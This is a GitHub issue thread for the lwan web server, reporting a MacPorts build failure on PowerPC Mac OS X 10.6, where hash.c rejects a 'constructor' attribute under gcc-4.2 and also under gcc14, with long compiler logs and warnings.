### ISSUE TITLE
Build fails: `hash.c: error: wrong number of arguments specified for ‘constructor’ attribute`

### ISSUE THREAD

**Issue by barracuda156** [lpereira/lwan#369]
```
:info:build [  3%] Building C object src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/missing.c.o
:info:build cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /usr/bin/gcc-4.2 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -Wno-unused-parameter -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -falign-functions=32 -fno-asynchronous-unwind-tables -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/missing.c.o -MF CMakeFiles/mimegen.dir/__/__/lib/missing.c.o.d -o CMakeFiles/mimegen.dir/__/__/lib/missing.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c
:info:build [  5%] Building C object src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/hash.c.o
:info:build cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /usr/bin/gcc-4.2 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -Wno-unused-parameter -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -falign-functions=32 -fno-asynchronous-unwind-tables -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/hash.c.o -MF CMakeFiles/mimegen.dir/__/__/lib/hash.c.o.d -o CMakeFiles/mimegen.dir/__/__/lib/hash.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c
:info:build [  6%] Building C object src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/murmur3.c.o
:info:build cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /usr/bin/gcc-4.2 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -Wno-unused-parameter -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -falign-functions=32 -fno-asynchronous-unwind-tables -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/murmur3.c.o -MF CMakeFiles/mimegen.dir/__/__/lib/murmur3.c.o.d -o CMakeFiles/mimegen.dir/__/__/lib/murmur3.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c
:info:build [  7%] Building C object src/bin/tools/CMakeFiles/configdump.dir/configdump.c.o
:info:build cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /usr/bin/gcc-4.2 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -Wno-unused-parameter -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -falign-functions=32 -fno-asynchronous-unwind-tables -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/configdump.dir/configdump.c.o -MF CMakeFiles/configdump.dir/configdump.c.o.d -o CMakeFiles/configdump.dir/configdump.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/configdump.c
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c: In function ‘MurmurHash3_x86_32’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:90: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:93: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:111: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c: In function ‘MurmurHash3_x86_128’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:155: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:156: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:157: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:158: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:159: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:160: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:161: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:162: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:179: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:185: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:191: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:197: warning: passing argument 2 of ‘rotl32’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c: In function ‘MurmurHash3_x64_128’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:247: warning: passing argument 2 of ‘rotl64’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:250: warning: passing argument 2 of ‘rotl64’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:254: warning: passing argument 2 of ‘rotl64’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:257: warning: passing argument 2 of ‘rotl64’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:283: warning: passing argument 2 of ‘rotl64’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c:311: warning: passing argument 2 of ‘rotl64’ with different width due to prototype
:info:build In file included from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/configdump.c:24:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:56: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:57: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:58: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:59: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:60: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:61: warning: ‘cold’ attribute directive ignored
:info:build In file included from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h:39,
:info:build                  from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/bin2hex.c:29:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:56: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:57: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:58: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:59: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:60: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:61: warning: ‘cold’ attribute directive ignored
:info:build In file included from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/bin2hex.c:29:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h: In function ‘coro_lwan_key_value_array_new’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h:337: warning: passing argument 2 of ‘coro_lwan_array_new’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h: In function ‘lwan_key_value_array_get_elem’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h:337: warning: declaration of ‘index’ shadows a global declaration
:info:build /usr/include/string.h:125: warning: shadowed declaration is here
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/bin2hex.c: In function ‘bin2hex’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/bin2hex.c:46: warning: passing argument 6 of ‘mmap’ with different width due to prototype
:info:build In file included from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h:39,
:info:build                  from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-private.h:25,
:info:build                  from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c:35:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:56: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:57: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:58: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:59: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:60: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:61: warning: ‘cold’ attribute directive ignored
:info:build In file included from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-private.h:25,
:info:build                  from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c:35:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h: In function ‘coro_lwan_key_value_array_new’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h:337: warning: passing argument 2 of ‘coro_lwan_array_new’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h: In function ‘lwan_key_value_array_get_elem’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h:337: warning: declaration of ‘index’ shadows a global declaration
:info:build /usr/include/string.h:125: warning: shadowed declaration is here
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c: At top level:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c:169: error: wrong number of arguments specified for ‘constructor’ attribute
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c: In function ‘hash_add_entry_hashed’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c:279: warning: implicit declaration of function ‘__builtin_add_overflow’
:info:build make[2]: *** [src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/hash.c.o] Error 1
:info:build make[2]: *** Waiting for unfinished jobs....
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/mimegen.c: In function ‘main’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/mimegen.c:234: warning: passing argument 2 of ‘strend’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/mimegen.c:235: warning: passing argument 2 of ‘strend’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/mimegen.c:236: warning: passing argument 2 of ‘strend’ with different width due to prototype
:info:build [  8%] Building C object src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/lwan-config.c.o
:info:build cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /usr/bin/gcc-4.2 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -Wno-unused-parameter -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -falign-functions=32 -fno-asynchronous-unwind-tables -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/lwan-config.c.o -MF CMakeFiles/configdump.dir/__/__/lib/lwan-config.c.o.d -o CMakeFiles/configdump.dir/__/__/lib/lwan-config.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-config.c
:info:build [ 10%] Building C object src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/lwan-strbuf.c.o
:info:build cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /usr/bin/gcc-4.2 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -Wno-unused-parameter -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -falign-functions=32 -fno-asynchronous-unwind-tables -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/lwan-strbuf.c.o -MF CMakeFiles/configdump.dir/__/__/lib/lwan-strbuf.c.o.d -o CMakeFiles/configdump.dir/__/__/lib/lwan-strbuf.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-strbuf.c
:info:build [ 11%] Building C object src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/lwan-status.c.o
:info:build [ 12%] Linking C executable bin2hex
:info:build cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /usr/bin/gcc-4.2 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -Wno-unused-parameter -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -falign-functions=32 -fno-asynchronous-unwind-tables -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/lwan-status.c.o -MF CMakeFiles/configdump.dir/__/__/lib/lwan-status.c.o.d -o CMakeFiles/configdump.dir/__/__/lib/lwan-status.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.c
:info:build cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/cmake -E cmake_link_script CMakeFiles/bin2hex.dir/link.txt --verbose=ON
:info:build In file included from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h:39,
:info:build                  from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:34:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:56: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:57: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:58: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:59: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:60: warning: ‘cold’ attribute directive ignored
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan-status.h:61: warning: ‘cold’ attribute directive ignored
:info:build In file included from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:34:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h: In function ‘coro_lwan_key_value_array_new’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h:337: warning: passing argument 2 of ‘coro_lwan_array_new’ with different width due to prototype
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h: In function ‘lwan_key_value_array_get_elem’:
:info:build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/lwan.h:337: warning: declaration of ‘index’ shadows a global declaration
:info:build /usr/include/string.h:125: warning: shadowed declaration is here
:info:build [ 13%] Building C object src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/hash.c.o
:info:build make[2]: Leaving directory `/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build'
:info:build cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /usr/bin/gcc-4.2 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -Wno-unused-parameter -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -falign-functions=32 -fno-asynchronous-unwind-tables -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/hash.c.o -MF CMakeFiles/configdump.dir/__/__/lib/hash.c.o.d -o CMakeFiles/configdump.dir/__/__/lib/hash.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c
:info:build make[1]: *** [src/bin/tools/CMakeFiles/mimegen.dir/all] Error 2
:info:build make[1]: *** Waiting for unfinished jobs....
```

**Comment by barracuda156** [comment]
Also fails with `gcc14`:
```
[  7%] Building C object src/bin/tools/CMakeFiles/mimegen.dir/mimegen.c.o
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /opt/local/bin/gcc-mp-14 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -fstack-protector-explicit -Wduplicated-cond -Wduplicated-branches -Wlogical-op -Wrestrict -Wdouble-promotion -Wno-unused-parameter -Wstringop-truncation -Wvla -Wno-free-nonheap-object -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -mtune=native -falign-functions=32 -fno-semantic-interposition -fno-asynchronous-unwind-tables -flto=jobserver -ffat-lto-objects -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/mimegen.dir/mimegen.c.o -MF CMakeFiles/mimegen.dir/mimegen.c.o.d -o CMakeFiles/mimegen.dir/mimegen.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/bin/tools/mimegen.c
[  8%] Linking C executable bin2hex
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/cmake -E cmake_link_script CMakeFiles/bin2hex.dir/link.txt --verbose=ON
[ 10%] Building C object src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/hash.c.o
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /opt/local/bin/gcc-mp-14 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -fstack-protector-explicit -Wduplicated-cond -Wduplicated-branches -Wlogical-op -Wrestrict -Wdouble-promotion -Wno-unused-parameter -Wstringop-truncation -Wvla -Wno-free-nonheap-object -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -mtune=native -falign-functions=32 -fno-semantic-interposition -fno-asynchronous-unwind-tables -flto=jobserver -ffat-lto-objects -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/hash.c.o -MF CMakeFiles/configdump.dir/__/__/lib/hash.c.o.d -o 